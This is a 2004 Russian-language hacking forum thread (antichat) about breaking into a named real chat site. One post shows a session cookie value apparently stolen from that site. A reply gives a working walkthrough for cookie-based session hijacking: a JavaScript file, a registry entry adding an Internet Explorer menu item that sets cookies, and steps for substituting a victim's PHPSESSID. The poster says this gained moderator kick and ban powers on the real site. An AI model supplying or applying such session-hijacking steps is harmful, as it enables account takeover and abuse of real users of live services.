Чаты Чат уродов

Discussion in 'Веб-уязвимости' started by Guest, 21 Jun 2004.

  1. Guest

    Guest Guest

    Reputations:
    0
    Интересный чат...по http://www.dmbchat.ru
    но чет не фига не хочеться....точнее не получаеться что либо с ним сделать....хелп ми....могу подробнее выложить чего с ним делал!
     
    #1 Guest, 21 Jun 2004
  2. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    #2 zFailure, 21 Jun 2004
  3. Легионер

    Легионер New Member

    Joined:
    22 Jun 2004
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    хм....ссылка конешно интересная....но только там по существу что то маловато....
     
    #3 Легионер, 22 Jun 2004
  4. Легионер

    Легионер New Member

    Joined:
    22 Jun 2004
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    и очень интересно вот с этим мона ченить сделать или ???REFERER=http://www.dmbchat.ru/main.php QUERY=PHPSESSID=21e69ff01b652ede26addb84d58b9c17; b=b; counter=1480713
     
    #4 Легионер, 22 Jun 2004
  5. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Легионер @ июня 22 2004,01:25)</td></tr><tr><td id="QUOTE">и очень интересно вот с этим мона ченить сделать или ???REFERER=http://www.dmbchat.ru/main.php QUERY=PHPSESSID=21e69ff01b652ede26addb84d58b9c17; b=b; counter=1480713[/QUOTE]<span id='postcolor'>
    я думал на antichat.ru не ходят ламаки которым надо объеснять что делать с украдеными куками! [​IMG] (тока без обид) [​IMG]
     
    #5 zFailure, 22 Jun 2004
  6. Легионер

    Легионер New Member

    Joined:
    22 Jun 2004
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ну на счет ламака это в тему...обьясни пожалуйста...ты же и сам когда то этого не знал...не губи...:)
     
    #6 Легионер, 22 Jun 2004
  7. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    ЕСЛИ КТО-ТО НЕ ЗНАЕТ ЧТО ДЕЛАТЬ С КУКАМИ ДАЮ СВОЙ СОВЕТ!

    создаем файл c:\cookie.html
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">&lt; script type="text/javascript">
    var xWin = external.menuArguments;
    var xDoc = xWin.document;
    var xSetCookie = prompt('Set-Cookie', 'you_are1=cacked1; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;');
    if (xSetCookie) xDoc.cookie = xSetCookie;
    //alert(xDoc.cookie);
    </script>[/QUOTE]<span id='postcolor'>

    создаем ключ в реестре
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">REGEDIT4

    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Set-Cookie]
    @="c:\\cookie.html"
    [/QUOTE]<span id='postcolor'>

    заходим на сайт (IE необходимо запустить заново)
    в нужном фрейме открываем контекстное меню IE и выбираем наш только что созданный элемент &quot;cookie&quot;

    в открывшемся диалоге изменяем you_are1 на нужное значение переменной (например: PHPSESSID), cacked1 на нужное значение переменной (например: 21e69ff01b652ede26addb84d58b9c17)

    после этого жмем OK, а потом обновить этот фрейм (или весь чат, если это не приведет к выкидыванию вас из чата)

    теперь для проверке открываем страничку ваших настроек/инфо и с ужасом обнаруживаем что там указан не ваш НИК =)

    при удаче в модерке вместо надписи &quot;Вам некем управлять&quot; (или что-то вроде этого) появитсясписок людей и кнопочки &quot;Kick&quot; и &quot;Ban&quot; рядом с каждым =)

    по крайней мере так у меня было в dmbchat.ru :D

    GL
     
    #7 zFailure, 23 Jun 2004
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.